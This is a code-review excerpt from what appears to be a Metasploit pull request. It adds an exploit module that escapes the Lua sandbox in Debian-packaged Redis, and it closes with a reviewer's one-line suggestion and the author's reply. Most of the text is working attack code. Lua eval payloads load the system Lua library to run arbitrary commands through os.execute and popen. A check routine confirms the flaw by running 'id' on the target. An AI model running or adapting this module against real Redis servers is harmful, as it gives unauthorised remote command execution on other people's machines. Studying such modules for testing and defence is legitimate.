modules/exploits/linux/redis/redis_debian_sandbox_escape.rb

```diff
@@ -0,0 +1,193 @@
+      'local res = f:read("*a"); ' \
+      'f:close(); ' \
+      "return res' 0" \
+      "\n"
+    sock.put(exploit)
+    sock.get(read_timeout)
+  end
+
+  # Use os.execute to execute the desired command. This doesn't return any output, and likely
+  # isn't meaningfully more useful than do_open but I wanted to demonstrate other execution
+  # possibility not demonstrated by the original poc.
+  def do_os_exec(cmd)
+    exploit = "eval '" \
+      "local os_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_os\"); " \
+      'local os = os_l(); ' \
+      "local f = os.execute(\"#{cmd}\"); " \
+      "' 0" \
+      "\n"
+
+    sock.put(exploit)
+    sock.get(read_timeout)
+  end
+
+  def check
+    connect
+
+    # Before we get crazy sending exploits over the wire, let's just check if this could
+    # plausiably be a vulnerable version. Using INFO we can check for:
+    #
+    # 1. 4 < Version < 6.1
+    # 2. OS contains Linux
+    # 3. redis_git_sha1:00000000
+    #
+    # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at
+    # package somewhere and it's nice to get final verification via exploitation anyway.
+    info_output = redis_command('INFO')
+    return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?
+    return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
+    return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
+
+    redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]
+    return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?
+    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
+    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
+    return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
+
+    # okay, looks like a worthy candidate. Attempt exploitation.
+    result = do_popen('id')
+    return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
+
+    Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")
+  ensure
+    disconnect
+  end
+
+  def execute_command(cmd, _opts = {})
+    connect
+
+    # force the redis mixin to handle auth for us
+    info_output = redis_command('INFO')
+    fail_with(Failure::NoAccess, 'The server did not respond') if info_output.nil?
+
+    # escape any single quotes
+    cmd = cmd.gsub("'", "\\\\'")
+
+    # On success, there is no meaningful response. I think this is okay because we already have
+    # solid proof of execution in check.
+    resp = do_os_exec(cmd).nil?
```

Comment:
```suggestion
    resp = do_os_exec(cmd)
```

Reply:
:facepalm:

Additionally, I addressed the fail_with below this statement. resp should be nil or, essentially, $-1.